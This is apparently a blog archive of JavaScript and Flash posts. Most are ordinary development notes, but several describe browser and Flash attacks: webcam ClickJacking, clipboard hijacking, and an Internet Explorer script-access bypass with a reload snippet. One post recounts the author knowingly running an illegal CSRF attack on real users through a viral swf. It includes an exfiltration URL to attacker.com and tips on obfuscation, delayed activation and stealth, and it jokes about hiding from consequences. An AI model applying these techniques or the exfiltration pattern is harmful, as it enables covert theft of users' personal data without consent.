Category Archives: Javascript

Malicious camera spying using ClickJacking

Update: Adobe has fixed this issue by framebusting the Settings Manager pages. Now, 99.9% of the users are protected from this specific exploit. Congrats on the fast response. —-

Turn every browser into a surveillance zombie. The wet dream of every private eye and peeping tom. Imagine this scenario, you play a short game on the web and by doing that you unknowingly grant someone full access to your webcam and microphone.

I’ve made a live demo of it in here, this demo won’t listen or record any of your input.

If you don’t want to try it or don’t have a webcam connected, then check out the video.

When I’ve first heard about ClickJacking and how Adobe is concerned about it, I thought that the Flash Player Security Dialog must have been compromised. But the Security Dialog does a good job disabling itself when you try to mess with it’s visibility through DHTML. Unless there’s some 0-day issue with the Dialog it’s probably relatively safe.

The problem here is the Flash Player Setting Manager, this inheritance from Macromedia might be the Flash Player security Achilles heel.

I’ve written a quick and dirty Javascript game that exploit just that, and demonstrate how an attacker can get a hold of the user’s camera and microphone. This can be used, for example, with platform like ustream, justin and alike or to stream to a private server to create a malicious surveillance platform.

I’ve made it as a JS game to make it easier to understand, but, bear in mind that every Flash, Java, SilverLight, DHTML game or application can be used to achieve the same thing.

Some of the clicks are real game clicks other are jacked clicks. Every time the click is needed to be jacked the content simply move behind the iframe using z-index

I had doubts about publishing this, but, if I could have understand it so are the bad guys, so it’s better to know about it.

In this case Adobe could have just framebust the pages that holds the Settings Manager. There are two issues with frambusting in this case, it won’t solve all cases (legacy browsers for ex) and will force Adobe to rely on javascript.

Play it here, watch it here

Thanx for not killing the Flash clipboard

Recently, a questionable Flash feature of writing to the user’s clipboard has been exploited. Adobe will finally fix this feature and it’ll require user interaction (mouse/keyboard click) in the upcoming Flash 10.

IMHO the people in charge of the Flash Player security have chosen the best option, retaining the functionality of the feature and still keeping the users secured.

Of course, a user can be led to click on the malicious Flash movie, or focus to the movie can be set and any keyboard press will lead to a pollution of the clipboard.

A more strict security measure could have been chosen, a dialog box asking the user to permit clipboard writing, could have been implemented. The Flash Player already uses a similar dialog when interacting with the user’s camera and mic. An updated Internet Explorer uses a dialog when interacting with the clipboard, allowing both read and write.

javascript:clipboardData.setData(“text”, “I’m in the clipboard”); (IE only)

 IE_clipboard

But, using the later option will make this feature too annoying for the user, and mostly useless.

Thanx for not killing this feature but still making it secure enough.

Regarding Flash movies that’ll still try to exploit this feature. It’s up to AD distributors and website owners to do their part and not distribute or host malicious files.

Encapsulating CSRF attacks inside massively distributed Flash movies – Real world example

Update: Added a sterilized demo and the source code.

CSRF (Cross Site Request Forgery) is considered one of the most widely spread exploits in websites today. I’ve written before about how a legitimate Flash file (swf) can be extremely viral. Few days ago I did a real attack, exploiting a CSRF flaw and elaborated it using the nature of Flash virality. The result shocked me.

I have a confession, I sometime look at the source of websites I browse, generally just to see how they did this and that. I also sometimes encounter security flaws in the script I examine, these flaws range from the very dangerous to the not so important, and my reactions range from informing the owners to just ignore it. I had the honor to find a very lame CSRF flaw in a big website which I’m familiar with it’s owners and some of its users. It was a great opportunity to do a real world test on this exploit. In the exploit I found, the attacker can obtain a lot of personal information from the user. A famous CSRF of similar nature has happened to gmail. Bear in mind that this kind of test is illegal and you should always be sure you won’t get in trouble, or just hide very well ;)

I took the same old viral movie of the pug cleaning the screen (screenclean.swf) and manipulated it (added some simple script) in a way that will attempt to attack any user that’ll view it, if the attack is successful and the user data is stolen it’ll be posted to my database (I’ll review the technical details at a latter point). I’ve then, uploaded the file to a server and sent the link to a few users that I know that uses that website, making it look like a naive chain letter.

pug_csrf

Then, I’ve waited for the stolen data to appear in my  database. It was exiting when the first hacked users started to emerge, and with every few refreshes there was a new one. It got a little scary when I saw users that I haven’t directly sent them the email. It was a proof of the virality of the attack.

csrf_db_table_01t

I was shocked when I saw that some of the users were added to my database being attacked from other servers then mine. This has proved the main point of the test, that attacks inside Flash (swf) files aren’t only viral but also get distributed. I wanted to show that this can happen pointing the screenclean.swf which can be found on ~600 different locations. I’ve never imagined that’ll it’ll happen so fast with my test, and on such an old movie.

After a few hours I’ve pulled the plug on this test and changed the swf file to the harmless original. But it was already too late the swf file got re-distributed (copied to other servers). Since I didn’t set the attack to expire and hasn’t obfuscate the code inside it, It was still attacking users, and worse, someone can look inside the swf and manipulate the attack to his needs. I had no control over that anymore, so we needed to fix this CSRF flaw ASAP.

Using Flash as a vessel to distribute CSRF attacks has some distinct benefits for the attacker:

- Beside the virality nature of these kind of Flash videos and games, swf files gets redistributed (hosted from other servers). This kind of attack will work no matter which server the file is served from, directly or embedded inside an html page.

- Script is hidden inside the Flash (swf), won’t be seen even with “View Generated Source”. Can be obfuscated inside the swf as well. Unless you’re watching the traffic you’ll see nothing suspicious.

- Multiple attacks in one swf. If it’s a game played for an hour, there is plenty of time to try many different attacks. The swf can download new kinds of attacks and/or instructions, when these are available, from the attacker server.

- Attack can be manipulated according to the date and time. For ex, let the swf distribute for a few days before starting to attack, set the attack to expire to make it more stealthy.

- Use shared object (Flash cookie) to maintain the user hacked status, more consistent then a cookie.

- Stealing large amount of data is easier as the data can be taken back to the swf and cross-domain Post can be used instead of Get.

Technical info

First of all, what enable this attack is the flaws and features inside every browser and the Flash Player, as I describe here.

Most CSRF attacks manipulate the user data on his behalf, as described here. The flaw I’ve found is returning live Javascript object with lots of personal data, similar to what happened to gmail. It was done this way, I guess, for ease of development, every page that is authenticated can load the url http://victim.com/personal.php?random and get the user’s data ready for any javascript code on the page, for ex, personalData.email.

The way that browsers are built, when the user is authenticated on one domain with a session or a cookie, every page that’ll load a url from this domain inside a script tag will use the authentication, even if the main page is on different domain. A script tag is one of these rare elements that are exempt from the browsers cross-domain-policy and can be loaded for use on different domains.

When the Flash movie (swf) is viewed inside a browser, the swf is “injecting” a javascript code to the page. This javascript is manipulating the page’s DOM and dynamically creating a script tag, this script is loading the vulnerable url as it source. Most of CSRF attacks will be done at this point, but, since our url is returning data, we need to wait for it and then steal it. We use an interval to check when the data is ready on the page, parse it as a string only with the important data then save it to our server database using the dynamically c
reated script with a get parameter http://attacker.com/stolenData.php?data=sensetive_data. We could have considered putting the data back into the swf and then post it to our server, Flash can do a cross-domain post as opposed to Javascript, might be more efficient when dealing with a large amount of data.

If the attack is successful we save it as a cookie, so we won’t attack the same user more then once. Again, we might consider using a Flash shared object which have more consistency.

Fixing the flaw in the website was just a matter of changing the returned data to a raw JSON instead of a live Javacript object. Fixing all CSRF flaws in a website generally is slightly more cumbersome, but not that much.

Added a sterilized demo and the source code.

Summery

Generally users feel comfortable following links, thinking it’s safe since they’re not installing anything, all the more so when it comes to links for flash and images.

This kind of attack is easy to reproduce, an attacker can simply go to youtube, download the FLV of the coolest short video and repeat the process, or worse, put it inside of an addictive game.

There is a tendency to accuse the platforms for being insecure. I agree that the browsers and the Flash Player will have to disallow scripting between them by default when loading a swf file directly, IE already tries to do it but fails miserably. That won’t solve any scenario though, since the harmful swf can be naively embedded inside an html page with scripting set to be allowed.

It’s always up to the developer to develop secure websites and applications without any CSRF or other type of flaws. No matter how strict is the platform (in this case the browsers and the Flash player), a “good” developer will be able to break the toughest security model in a second by writing vulnerable script.

It up to the developer to be a Safeloper and to produce secure applications ;)

The users should be able to feel safe following a link they get in an email message, it’s part of the nature of the Internet, following links that is.

I also did a similar attack using a JPG but that’s a different story.

Bug in Internet Explorer security model when embedding Flash

Update: I’ve posted a real world example of this bug being exploited.

This one has the same behavior on IE6, IE7 and IE8 betas.

I have only tested this with Flash swf files, but it’s likely that this security is applied and broken the same way, when navigating to different types of files.

When loading Flash file (swf) directly inside the browser without an html page container, for ex: http://example.com/game.swf , most browsers create an html page automatically and embed the swf inside it. FireFox and Google Chrome, for that matter, automatically create an embed tag with some default values, and IE uses this mshtml script (res://mshtml.dll/objectembed_neutral.js) to load the object.

The fact that this automatically created embed tag doesn’t mention the allowscriptaccess property it’s defaulted to samedomain. This way the swf file can script the automatically generated html page it resides in, using ExternalInterface, leading to a major security flaw. I will post about a real world example of this security flaw, shortly.

Internet Explorer, rightfully, consider this generated page as less secure and as such restrict access to the JavaScript document object. It’s preventing from the embedded swf to script the DOM of the page.

Just test it, go to any swf file on the web using Internet explorer, then run this script in the address bar javascript:alert(document); you’ll see the error “Access is denied”. Touching the document is prohibited!

Error_Access_Denied

But, all that is needed to compromise this security feature in IE is to reload the page. That’s it, just reload the page once by pressing F5. Run the script again javascript:alert(document); you’ll see the precious document and no error will be thrown.

Since most of the other javascript objects are still available and among these is the window native object. A swf file, for example, can reload the page on its own using window.location.reload() and then will be able to bypass the restriction and freely manipulate the page.

This script can run from inside the swf using ExternaInterface.call(“eval”, “script”); If the “try” clause fail it’s probably an IE browser and the page will reload immediately without the user noticing. The 2nd time the page loads the “try” clause won’t fail.

try{
   $d = document;
   //Mess with the DOM
}catch(ex){
   window.location.reload();
}

I was impressed that Microsoft implemented such a security feature as opposed to FireFox, Chrome and others who don’t have a similar restriction. but, it needs to be done right otherwise it misses the point.

As I said, I’ll post a real world example of this being exploited, soon.

Mysteries Flash exploit is hijacking the clipboard?

Update: Adobe Product Security Incident Response Team (PSIRT) has referred to this “Clipboard attack”

Update 2: Aviv Raff has updated me about the fact that it won’t be that easy to replicate this attack using Javascript on the latest browsers and with the default security settings. Thanx.

Lately there were some rumors about a mysteries Flash exploit that is hijacking the users clipboard and will always fill it with a URL to some malicious website, no matter what you’ll copy to the clipboard it’ll will always paste the same URL. This malicious website will ask you to download a fake anti-virus. It’s also been mentioned in some places that in order to clear this behavior you’ll have to restart your machine.

But is it really an exploit, a bug in the Flash player that let the attacker demolish the users clipboard until restart?! From what I’ve seen so far it’s not an exploit and no restart is needed, it’s just a bad use of a Flash and JavaScript feature. Both of these allow a valid script to write text to the user’s clipboard. I’m surprised that only now this questionable feature is starting to get abused. The abusing code is probably residing in some Flash AD, in one of the user tabs and consistently rewriting the clipboard.

Although this attack can be done using simple JavaScript, Flash it the right vessel for this kind of attacks. I think that, encapsulating attacks inside RIA code, mainly Flash and SilverLight, is just starting to gain attention and will become a major security issue. I have some other examples which I attend to write about soon.

A nice SilverLight showoff by Microsoft

Microsoft recently released the SilverLight version of their Download Center. Its a nice demonstration of the SilverLight technology. But, looking under the hood reveals the huge amount of Javascript used to run this website. I can’t see the benefit this has over DHTML if all the logic is anyway implemented by Javascript. The only thing that was maybe more natural doing using SL is the small rotating arrows on the right floating menu. Obviously that won’t make it as a good argument for selecting the right technology for a project.

SilverLight_menu

It reminds me of when SilverLight was getting solidified into the final 1.0 version still named WPF/E. The only thing that came to my mind was WTF/E is this cr*p?! After all we were promised, all this buildup, this is what we’re getting?! A stupid rendering layer with no logic?! Neitherless to say that it was very disappointing.

MS hurry to release SL bigger brother "SilverLight 1.1 Alpha" that is now going to be named SilverLight 2.0. This version will have a subset of the .NET CLR, logic written in C# and all king of goodies. Hopefully MS can keep up to some of it’s promises with this release.

Resolving some issues with swfobject

There are some known issues with swfobject and ASP.NET, infact it’s not just with swfobject but also with the Flash object in general, one issue of using ExternaInterafce from an ASP.NET Form can be solved with these technics

I had a strange issue with swfobject lately and obviously I’ve blamed ASP.NET for inserting unwanted code into my pages and causing problems. Generally it’s reasonable to blame it as it does make a mess sometimes, but, this time it was my fault for not noticing other Javascript code is conflicting with swfobject.

The issue I had, was with the swfobject’s addVariable and addParam functions. The Flash SWF HTML seemed to be written to the page’s flashContent div but all of the variables and parameters I’ve added were ignored. After examining the swfobject getSWFHTML function, this function gives you the HTML code that is gonna embed the Flash inside the page, when I saw how strange the HTML is, I realized what happened:
Without naming names ;) some Javascript developers, extensions and frameworks like to write to the prototype of generic Javascript objects (This is also how Object Oriented Actionscript 1 was done in the past). And with doing so, extending these built-in objects (object, array, string, etc’) with various functionalities. A good example is the javascript JSON implementation which extends the Javascript object with object.toJSONString(). Swfobject stores the variables and parameters inside a regular Javascript object and when it prepares the Flash HTML it uses a for..in loop to go through all the elements and add them to the markup
<param value=”flashMovie.swf” name=”movie” />
<param value=”transparent” name=”wmode” /> etc’

in case you’re using the json.js, your HTML will have also
<param name=”toJSONString” value=”function (w) {….and whole lotta mess” />.

This might cause the embedding of the Flash movie to fail or function improperly.

The solution for this is to add a check to all of the for..in loops inside swfobject with the hasOwnProperty, for example:

[JS]for(key in variables){
if( variables.hasOwnProperty( key ) )
{
variablePairs[variablePairs.length] = key +”=”+ variables[key];
}
}[/JS]

The hasOwnProperty function returns true only if the property is not built-in and not in the prototype chain. Therefor the toJSONString in our example will return false and wont be considered as a flash variable or parameter.

When encountering issues with the swfobject a good place to check is the swfobject.getSWFHTML() function.
[JS]var o=new SWFObject(“flashFile.swf”,”falshMovie”,200,300,”9″,”#FFFFFF”);
o.addVariable(“firstName”,”Jon”);
o.addVariable(“lastName”,”Smith”);
o.addParam(“wmode”,”transparent”);

//exmine the html before it’s being writen to the div
alert(o.getSWFHTML());

o.write(“flashContent”); [/JS]

More related info about hasOwnProperty.

Script# – C# compiled into Javascript

This might sound familiar to you, the idea of writing an Object Oriented code, that allow compile-time checking, and good code design, that is then compiled into a script code was introduced by Macromedia at 2003 with Flash 7 and it’s shiny new Actionscript 2.0, but, AS2, with all the respect is not as complete as C#.

Script# does the same for Javascript, it lets you leverage the power of C# with it’s Object Oriented abilities and compile it into a clean and readable Javascript.
The new Script# version 0.2.0.0 now have added support for WPF/E.

Learn more about it…

There is a similar OS tool named Google Web Toolkit that appearntly does similar things for Java and Javascript.

Uglying your photos with style

You might call it Pimp if you want it to sound cooler, but all in all pikipimp.com will help you make fun of people by uglying their images. Check out how I’ve uglified this beautiful model. You won’t see too many masterpieces coming from there, maybe also because it isn’t meant for creating works of art. The “Pimping” is easily done and is accessible for everyone. You simply upload your photo and immediately you can start to drag elements like beards and glasses on it.

I think, that not so long ago, maybe a year ago, it was unlikely that such a website will emerge. Before the Javascript-goldenage no one would have dare to use such a complex Javascript which now looks very natural to use. Also the hype around such a site wouldn’t be as massive, these days it is mentioned in many of the leading Web 2.0 / technical blogs like Techcrunch and Go2Web2.

While it was neatly done with javascript, and I’ve read the author mentioned Ruby, some apps are just ment to be flashed. For example, rotating the elements is done by the server and suffer from a long unintuitive delay, Flash could easily handle these rotations on the client. Also, the stacking of the elements is done by setting the HTML div’s position to absolute, that’s the only way z-index can be applied in HTML, on the other hand, your image is embeded along with the relative site structure, so, if you resize your page your creation get scrambled. There are many more improvements that Flash could have handled, I won’t have to tell you everything, when every stupid innovation is worth millions of dollars and can be called a Start-Up these days ;) lol.

Get piki-pimping…

PikiPimp Interface

pikipimp_glasses

Every element has it’s own controls

pikipimp_controls

Original photo

pikipimp_model_small

Pimped (uglified) photo

pikipimp_pimped

Best way to get address variables into Flash

I’ve seen too many wrong or old soulotions for sending query string variables into Flash (page.html?var1=Jon&var2=Smith… etc.). In fact, if you’ll google it you’ll find this old Macromedia article from the year 2000 and about Flash 4, while most of it still applies it’s definitely old. These days, we’re using swfobject, if you don’t use it then you should, swfobject comes with a “global” javascript function called getQueryParamValue and you can use it for setting query/address string variables into FlashVars as follows:

[js]var so = new SWFObject(“movie.swf”, “flashMovie”, “250″, “150″, “8″, “#FFFFFF”);
so.addVariable(“var1″, getQueryParamValue(“var1″));
so.addVariable(“var2″, getQueryParamValue(“var2″));[/js]

These variables will be availble as _root.var1, _root.var2, etc. For complete explanation go here. The best thing about FlashVars is that they are available for use as soon as the Flash movie starts, and before everything else, so you can refer, for example, to the variable _root.var1 in the first line of code, as opposed to another old method setVariable, where we had to wait for the variable availability using somthing like watch.

Though the advantage of FlashVars, personly, I don’t like _root variables, it seems unclean, especially when it’s a long query string that’ll make tons of them floating in my _root. Since Flash 8 we can use ExternalInterface to call to getQueryParamValue and get an immediate and synchronous response from within Flash, that way we can have a neater control over owr address variables, for example:

[as]var sVar1:Object = ExternalInterface.call(“getQueryParamValue”, “var1″);[/as]

Play with the example, try different variables.

If you don’t use swfobject, I guess you can easily write your own javascript method for getting address variables, but why bother, I don’t think you can easily improve on that one. I also don’t think that Geoff Stearns, the author of swfobject, will care if you’ll copy this function:

[js]function getQueryParamValue(param){
var q = document.location.search || document.location.hash; if(q){
var startIndex = q.indexOf(param +”=”);
var endIndex = (q.indexOf(“&”, startIndex) > -1) ? q.indexOf(“&”, startIndex) : q.length;
if (q.length > 1 && startIndex > -1) {
return q.substring(q.indexOf(“=”, startIndex)+1, endIndex);
}
}
return “”;
}[/js]

It’s great for non flash websites as well.

Get example files

Get swfobject